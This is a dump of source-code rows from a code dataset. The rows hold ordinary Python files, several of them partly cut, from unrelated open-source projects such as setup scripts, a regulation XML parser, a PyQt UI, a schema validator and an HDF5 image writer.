] | null | null | null | ovs/extensions/hypervisor/hypervisors/vmware.py | rootfs-analytics/openvstorage | 6184822340faea1d2927643330a7aaa781d92d36 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module for the VMware hypervisor client
"""
import os
from ovs.extensions.hypervisor.apis.vmware.sdk import Sdk
| 34.860697 | 123 | 0.628942 |
fbf2ccc900304e6fa6940b6cc3e4418b5177231a | 6,314 | py | Python | fake_switches/dell10g/command_processor/config_interface.py | idjaw/fake-switches | 9b481e17a26cca24bf3ef44466feebf9bff794f8 | [
"Apache-2.0"
] | null | null | null | fake_switches/dell10g/command_processor/config_interface.py | idjaw/fake-switches | 9b481e17a26cca24bf3ef44466feebf9bff794f8 | [
"Apache-2.0"
] | 1 | 2022-02-11T03:49:01.000Z | 2022-02-11T03:49:01.000Z | fake_switches/dell10g/command_processor/config_interface.py | idjaw/fake-switches | 9b481e17a26cca24bf3ef44466feebf9bff794f8 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from fake_switches.dell.command_processor.config_interface import DellConfigInterfaceCommandProcessor, parse_vlan_list
from fake_switches.switch_configuration import AggregatedPort
| 46.77037 | 119 | 0.548939 |
fbf2e31cb815224097d8066fca9f33447d38f065 | 939 | py | Python | setup.py | Spredzy/python-memsource | 9624a1e93dab9cec874164fb390432c51ab0de31 | [
"Apache-2.0"
] | null | null | null | setup.py | Spredzy/python-memsource | 9624a1e93dab9cec874164fb390432c51ab0de31 | [
"Apache-2.0"
] | null | null | null | setup.py | Spredzy/python-memsource | 9624a1e93dab9cec874164fb390432c51ab0de31 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import setuptools
from memsource import version
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="memsource",
version=version.__version__,
author="Yanis Guenane",
author_email="yguenane+opensource@gmail.com",
description="Python bindings for Memsource",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Spredzy/python-memsource",
packages=setuptools.find_packages(),
install_requires=[
"requests"
],
classifiers=[
"Programming Language :: Python :: 3",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX :: Linux",
],
python_requires=">=3.6",
)
| 27.617647 | 61 | 0.664537 |
fbf375a6746c12699f7672902496fe49ba8773ae | 5,637 | py | Python | sktime/transformations/series/func_transform.py | marcio55afr/sktime | 25ba2f470f037366ca6b0e529137d3d0a6191e2e | [
"BSD-3-Clause"
] | 2 | 2021-12-28T10:48:11.000Z | 2022-03-06T18:08:01.000Z | sktime/transformations/series/func_transform.py | marcio55afr/sktime | 25ba2f470f037366ca6b0e529137d3d0a6191e2e | [
"BSD-3-Clause"
] | 2 | 2021-04-19T17:38:33.000Z | 2021-07-25T18:44:10.000Z | sktime/transformations/series/func_transform.py | marcio55afr/sktime | 25ba2f470f037366ca6b0e529137d3d0a6191e2e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-
"""Implements FunctionTransformer, a class to create custom transformers."""
__author__ = ["Bouke Postma"]
__all__ = ["FunctionTransformer"]
import numpy as np
from sktime.transformations.base import _SeriesToSeriesTransformer
from sktime.utils.validation.series import check_series
def _identity(X):
"""Return X."""
return X
| 33.553571 | 88 | 0.631896 |
fbf4288218731b27d1646ee39344ec7cc83f8d4a | 13,963 | py | Python | regparser/tree/xml_parser/reg_text.py | cfpb/regulations-parser | 9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424 | [
"CC0-1.0"
] | 36 | 2015-01-05T21:17:36.000Z | 2020-04-28T21:02:55.000Z | regparser/tree/xml_parser/reg_text.py | DalavanCloud/regulations-parser | 9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424 | [
"CC0-1.0"
] | 49 | 2015-01-28T15:54:25.000Z | 2018-08-20T20:20:08.000Z | regparser/tree/xml_parser/reg_text.py | DalavanCloud/regulations-parser | 9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424 | [
"CC0-1.0"
] | 23 | 2015-01-28T15:34:18.000Z | 2021-02-20T10:53:34.000Z | # vim: set encoding=utf-8
import re
from lxml import etree
import logging
from regparser import content
from regparser.tree.depth import heuristics, rules, markers as mtypes
from regparser.tree.depth.derive import derive_depths
from regparser.tree.struct import Node
from regparser.tree.paragraph import p_level_of
from regparser.tree.xml_parser.appendices import build_non_reg_text
from regparser.tree import reg_text
from regparser.tree.xml_parser import tree_utils
from settings import PARAGRAPH_HIERARCHY
def get_reg_part(reg_doc):
"""
Depending on source, the CFR part number exists in different places. Fetch
it, wherever it is.
"""
potential_parts = []
potential_parts.extend(
# FR notice
node.attrib['PART'] for node in reg_doc.xpath('//REGTEXT'))
potential_parts.extend(
# e-CFR XML, under PART/EAR
node.text.replace('Pt.', '').strip()
for node in reg_doc.xpath('//PART/EAR')
if 'Pt.' in node.text)
potential_parts.extend(
# e-CFR XML, under FDSYS/HEADING
node.text.replace('PART', '').strip()
for node in reg_doc.xpath('//FDSYS/HEADING')
if 'PART' in node.text)
potential_parts.extend(
# e-CFR XML, under FDSYS/GRANULENUM
node.text.strip() for node in reg_doc.xpath('//FDSYS/GRANULENUM'))
potential_parts = [p for p in potential_parts if p.strip()]
if potential_parts:
return potential_parts[0]
def get_title(reg_doc):
""" Extract the title of the regulation. """
parent = reg_doc.xpath('//PART/HD')[0]
title = parent.text
return title
def preprocess_xml(xml):
"""This transforms the read XML through macros. Each macro consists of
an xpath and a replacement xml string"""
for path, replacement in content.Macros():
replacement = etree.fromstring('<ROOT>' + replacement + '</ROOT>')
for node in xml.xpath(path):
parent = node.getparent()
idx = parent.index(node)
parent.remove(node)
for repl in replacement:
parent.insert(idx, repl)
idx += 1
# @profile
def get_markers(text):
""" Extract all the paragraph markers from text. Do some checks on the
collapsed markers."""
markers = tree_utils.get_paragraph_markers(text)
collapsed_markers = tree_utils.get_collapsed_markers(text)
# Check that the collapsed markers make sense (i.e. are at least one
# level below the initial marker)
if markers and collapsed_markers:
initial_marker_levels = p_level_of(markers[-1])
final_collapsed_markers = []
for collapsed_marker in collapsed_markers:
collapsed_marker_levels = p_level_of(collapsed_marker)
if any(c > f for f in initial_marker_levels
for c in collapsed_marker_levels):
final_collapsed_markers.append(collapsed_marker)
collapsed_markers = final_collapsed_markers
markers_list = [m for m in markers] + [m for m in collapsed_markers]
return markers_list
def next_marker(xml_node, remaining_markers):
"""Try to determine the marker following the current xml_node. Remaining
markers is a list of other marks *within* the xml_node. May return
None"""
# More markers in this xml node
if remaining_markers:
return remaining_markers[0][0]
# Check the next xml node; skip over stars
sib = xml_node.getnext()
while sib is not None and sib.tag in ('STARS', 'PRTPAGE'):
sib = sib.getnext()
if sib is not None:
next_text = tree_utils.get_node_text(sib)
next_markers = get_markers(next_text)
if next_markers:
return next_markers[0]
| 37.840108 | 78 | 0.587911 |
fbf49444e0f4679af981bbaa8faf8266920ca318 | 1,216 | py | Python | setup.py | mark-dawn/stytra | be1d5be0a44aeb685d475240d056ef7adf60ed06 | [
"MIT"
] | null | null | null | setup.py | mark-dawn/stytra | be1d5be0a44aeb685d475240d056ef7adf60ed06 | [
"MIT"
] | null | null | null | setup.py | mark-dawn/stytra | be1d5be0a44aeb685d475240d056ef7adf60ed06 | [
"MIT"
] | null | null | null | from distutils.core import setup
from setuptools import find_packages
setup(
name="stytra",
version="0.1",
author="Vilim Stih, Luigi Petrucco @portugueslab",
author_email="vilim@neuro.mpg.de",
license="MIT",
packages=find_packages(),
install_requires=[
"pyqtgraph>=0.10.0",
"numpy",
"numba",
"matplotlib",
"pandas",
"qdarkstyle",
"qimage2ndarray",
"deepdish",
"param",
"pims",
"GitPython",
"pymongo",
"colorspacious",
"arrayqueues",
],
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
# Pick your license as you wish (should match "license" above)
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
keywords="tracking processing",
description="A modular package to control stimulation and track behaviour in zebrafish experiments.",
project_urls={
"Source": "https://github.com/portugueslab/stytra",
"Tracker": "https://github.com/portugueslab/stytra/issues",
},
)
| 28.27907 | 105 | 0.591283 |
fbf4c0c322e799620006a7ec56b567282c3ba0ca | 226 | py | Python | checkTicTacToe/checkTicTacToe.py | nate-ar-williams/coding-questions | 24baa901a786e6e2c4e8ea823a26416bc51e1f6a | [
"MIT"
] | null | null | null | checkTicTacToe/checkTicTacToe.py | nate-ar-williams/coding-questions | 24baa901a786e6e2c4e8ea823a26416bc51e1f6a | [
"MIT"
] | null | null | null | checkTicTacToe/checkTicTacToe.py | nate-ar-williams/coding-questions | 24baa901a786e6e2c4e8ea823a26416bc51e1f6a | [
"MIT"
] | null | null | null | #!/usr/bin/python3
# let board be 3x3 bool array
if __name__ == '__main__':
main()
| 12.555556 | 32 | 0.588496 |
fbf52c7f3a9bab66d56f2bccbaf8974ecb5420d3 | 2,138 | py | Python | openerp/exceptions.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 3 | 2016-01-29T14:39:49.000Z | 2018-12-29T22:42:00.000Z | openerp/exceptions.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 2 | 2016-03-23T14:29:41.000Z | 2017-02-20T17:11:30.000Z | openerp/exceptions.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" OpenERP core exceptions.
This module defines a few exception types. Those types are understood by the
RPC layer. Any other exception type bubbling until the RPC layer will be
treated as a 'Server error'.
"""
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 37.508772 | 78 | 0.658092 |
fbf6f8315c8b89ca91d3b286cb9fd7bfaffd9e47 | 83,653 | py | Python | MainUi.py | james646-hs/Fgo_teamup | f1e5c6f514818b68e9abb9eab3c6103fd000819a | [
"MIT"
] | 18 | 2020-05-30T01:41:24.000Z | 2021-03-04T08:07:35.000Z | MainUi.py | james646-hs/Fgo_teamup | f1e5c6f514818b68e9abb9eab3c6103fd000819a | [
"MIT"
] | 1 | 2020-08-13T02:19:42.000Z | 2020-08-13T02:19:42.000Z | MainUi.py | james646-hs/Fgo_teamup | f1e5c6f514818b68e9abb9eab3c6103fd000819a | [
"MIT"
] | 2 | 2020-06-13T18:23:07.000Z | 2020-08-13T02:08:54.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MainUi.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
| 64.746904 | 106 | 0.748927 |
fbf8cddf274b4edc3f9ca19f3358df84f5395fdb | 4,122 | py | Python | utils/argparse.py | toytag/self-supervised-learning-for-semantic-segmentation | b3326df6d1fa045fabb27fc30542313adee00d30 | [
"MIT"
] | null | null | null | utils/argparse.py | toytag/self-supervised-learning-for-semantic-segmentation | b3326df6d1fa045fabb27fc30542313adee00d30 | [
"MIT"
] | null | null | null | utils/argparse.py | toytag/self-supervised-learning-for-semantic-segmentation | b3326df6d1fa045fabb27fc30542313adee00d30 | [
"MIT"
] | null | null | null | import argparse
| 64.40625 | 90 | 0.566715 |
fbf9c31021598e1cfc750b4e1fb2c63076b4d3ce | 2,401 | py | Python | finicky/schema.py | yaaminu/yaval | 32f04ecfa092c978fc026f6b7f58d6cf2defd8c9 | [
"MIT"
] | 14 | 2021-02-12T19:04:21.000Z | 2021-03-12T18:18:09.000Z | finicky/schema.py | yaaminu/yaval | 32f04ecfa092c978fc026f6b7f58d6cf2defd8c9 | [
"MIT"
] | 5 | 2021-02-12T16:04:37.000Z | 2021-04-14T12:05:02.000Z | finicky/schema.py | yaaminu/yaval | 32f04ecfa092c978fc026f6b7f58d6cf2defd8c9 | [
"MIT"
] | null | null | null | from finicky.validators import ValidationException
def validate(schema, data, hook=None):
"""
Given an input named `data` validate it against `schema` returning errors encountered if any and the input data.
It's important to note that, validation continues even if an error is encountered.
:param schema: The schema against which the input should be validated. A schema is essentially a mapping of field
names and their corresponding validators. The keys must match exactly to fields in the input data.
Pyval comes with a set of standard validators defined in `finicky.validators` but you can write your own
if your need a more customized one.
A validator is a function which takes in a single argument and returns the validated
data on success. On failure, it must raise a `finicky.validators.ValidationException`. To illustrate in code:
```
def my_custom_batch_no_validator(input):
if not input:
raise ValidationException("This field is required")
elif not input.contains("prefix_")
raise ValidationException("This field must start with `prefix_`")
else:
# you can modify the value, like striping off whitespace, rounding up the number etc
return input.strip()
```
:param data: The input data to be validated, cannot be none
:param hook: An optional custom hook function that shall be invoked when all fields have passed validation. It is
especially useful in situations where the validity of the input also conditionally relies on multiple
fields. it takes as an input, the newly validated data and must return the input on success
or raise a `finicky.validators.ValidationException` on failure. This hook may modify the input before
returning it.
:return: A tuple of the form (errors:str[], validated_data)
"""
errors = {}
validated_data = {}
for key in schema:
try:
validated_data[key] = schema[key](data.get(key))
except ValidationException as e:
errors[key] = e.errors
if hook and not errors:
try:
validated_data = hook(validated_data)
except ValidationException as e:
errors["___hook"] = e.errors
return errors, validated_data
__all__ = ("validate",)
| 49 | 118 | 0.678051 |
fbfb1bbd5566de1b6744d8dee7be28df74fd818c | 3,194 | py | Python | tests/unique_test.py | yohplala/vaex | ca7927a19d259576ca0403ee207a597aaef6adc2 | [
"MIT"
] | null | null | null | tests/unique_test.py | yohplala/vaex | ca7927a19d259576ca0403ee207a597aaef6adc2 | [
"MIT"
] | null | null | null | tests/unique_test.py | yohplala/vaex | ca7927a19d259576ca0403ee207a597aaef6adc2 | [
"MIT"
] | null | null | null | from common import small_buffer
import pytest
import numpy as np
import pyarrow as pa
import vaex
| 33.270833 | 102 | 0.584534 |
fbfb4b2b18ec51f6264b25bae8ef574c623943f4 | 810 | py | Python | utils/utilsFreq.py | geobook2015/magPy | af0f31fc931786ac6f8d69a5290366418035859d | [
"Apache-2.0"
] | 1 | 2021-05-19T18:29:15.000Z | 2021-05-19T18:29:15.000Z | utils/utilsFreq.py | geobook2015/magPy | af0f31fc931786ac6f8d69a5290366418035859d | [
"Apache-2.0"
] | null | null | null | utils/utilsFreq.py | geobook2015/magPy | af0f31fc931786ac6f8d69a5290366418035859d | [
"Apache-2.0"
] | 2 | 2021-06-03T01:59:02.000Z | 2021-07-03T07:47:10.000Z | # utility functions for frequency related stuff
import numpy as np
import numpy.fft as fft
import math
# use this function for all FFT calculations
# then if change FFT later (i.e. FFTW), just replace one function
| 27.931034 | 65 | 0.728395 |
fbfbfe77a095f3da5c436ccb64b9b59f084a3b2c | 2,329 | py | Python | tools/extract_keywords.py | bitdotioinc/pglast | da4c0b1c237aad98894179af9cd29e044d526ba8 | [
"PostgreSQL"
] | null | null | null | tools/extract_keywords.py | bitdotioinc/pglast | da4c0b1c237aad98894179af9cd29e044d526ba8 | [
"PostgreSQL"
] | null | null | null | tools/extract_keywords.py | bitdotioinc/pglast | da4c0b1c237aad98894179af9cd29e044d526ba8 | [
"PostgreSQL"
] | null | null | null | # -*- coding: utf-8 -*-
# :Project: pglast -- Extract keywords from PostgreSQL header
# :Created: dom 06 ago 2017 23:34:53 CEST
# :Author: Lele Gaifax <lele@metapensiero.it>
# :License: GNU General Public License version 3 or later
# :Copyright: 2017, 2018 Lele Gaifax
#
from collections import defaultdict
from os.path import basename
from pprint import pformat
from re import match
import subprocess
HEADER = """\
# -*- coding: utf-8 -*-
# :Project: pglast -- DO NOT EDIT: automatically extracted from %s @ %s
# :Author: Lele Gaifax <lele@metapensiero.it>
# :License: GNU General Public License version 3 or later
# :Copyright: 2017 Lele Gaifax
#
"""
if __name__ == '__main__':
main()
| 30.246753 | 88 | 0.613568 |
fbfc768e9b9032e8d1b05f89ef3578bc75d58172 | 1,913 | py | Python | tests/vi/test_indent_text_object.py | trishume/VintageousPlus | 1dd62435138234979fe5bb413e1731119b017daf | [
"MIT"
] | 6 | 2017-04-01T05:30:08.000Z | 2017-04-05T14:17:40.000Z | tests/vi/test_indent_text_object.py | trishume/VintageousPlus | 1dd62435138234979fe5bb413e1731119b017daf | [
"MIT"
] | 1 | 2017-04-04T06:47:13.000Z | 2017-04-04T14:26:32.000Z | tests/vi/test_indent_text_object.py | trishume/VintageousPlus | 1dd62435138234979fe5bb413e1731119b017daf | [
"MIT"
] | null | null | null | from collections import namedtuple
from sublime import Region as R
from VintageousPlus.tests import set_text
from VintageousPlus.tests import add_sel
from VintageousPlus.tests import ViewTest
from VintageousPlus.vi.text_objects import find_indent_text_object
test = namedtuple('simple_test', 'content start expected expected_inclusive msg')
# cursor is at "|"
TESTS_INDENT = (
test(start=R(37, 37), expected=R(29, 62), expected_inclusive=R(29, 62), msg='should find indent', content='''
# a comment
def a_ruby_block
some_c|all
another_one
yerp
end'''.lstrip()),
test(start=R(37, 37), expected=R(29, 41), expected_inclusive=R(29, 80), msg='should find indent when there\'s a blank line', content='''
# a comment
def a_ruby_block
some_c|all
another_one_with(blank_line)
yerp
end'''.lstrip()),
test(start=R(42, 42), expected=R(34, 57), expected_inclusive=R(34, 58), msg='should work with pyhton-ey functions', content='''
# a python thing
def a_python_fn:
some_c|all()
what()
a_python_fn'''.lstrip()),
test(start=R(57, 57), expected=R(57, 57), expected_inclusive=R(57, 57), msg='should ignore when triggered on a whitespace-only line', content='''
# a python thing
def a_python_fn:
some_call()
what()
a_python_fn'''.lstrip()),
)
| 28.552239 | 149 | 0.681652 |
fbfd008303bf64141666afab184cb7b1413f62e6 | 1,417 | py | Python | example_write_camera_frames_to_hdf5.py | mihsamusev/pytrl_demo | 411a74cb5f3601f03438f608b4cf8e451a88345e | [
"MIT"
] | null | null | null | example_write_camera_frames_to_hdf5.py | mihsamusev/pytrl_demo | 411a74cb5f3601f03438f608b4cf8e451a88345e | [
"MIT"
] | null | null | null | example_write_camera_frames_to_hdf5.py | mihsamusev/pytrl_demo | 411a74cb5f3601f03438f608b4cf8e451a88345e | [
"MIT"
] | null | null | null | import cv2
from imutils.paths import list_images
import imutils
import re
import datetime
from datasets.hdf5datasetwriter import HDF5DatasetWriter
import progressbar
def get_timestamp(impath):
"assuming that the timestamp is a part of the image name"
date_str = impath.split(".")[0]
date_str = re.split(r"image data \d+ ", date_str)[1]
date = datetime.datetime.strptime(date_str, '%Y-%b-%d %H %M %S %f')
return date
# Load the data, sort by frame number
basePath = "D:/create lidar trafik data/newer data/ImageData/"
impaths = list(list_images(basePath))
impaths = sorted(impaths, key=get_frame_number)
print("[INFO] building HDF5 dataset...")
outputPath = basePath + "frames.hdf5"
writer = HDF5DatasetWriter((len(impaths), 360, 640, 3), outputPath)
# initialize the progress bar
widgets = ["Building Dataset: ", progressbar.Percentage(), " ",
progressbar.Bar(), " ", progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=len(impaths),
widgets=widgets).start()
for i, impath in enumerate(impaths):
date = get_timestamp(impath)
ts = (date - datetime.datetime(1970, 1, 1)) / datetime.timedelta(seconds=1)
image = cv2.imread(impath)
image = imutils.resize(image, width=640)
writer.add([image], [ts])
pbar.update(i)
# close the HDF5 writer
pbar.finish()
writer.close() | 31.488889 | 79 | 0.715596 |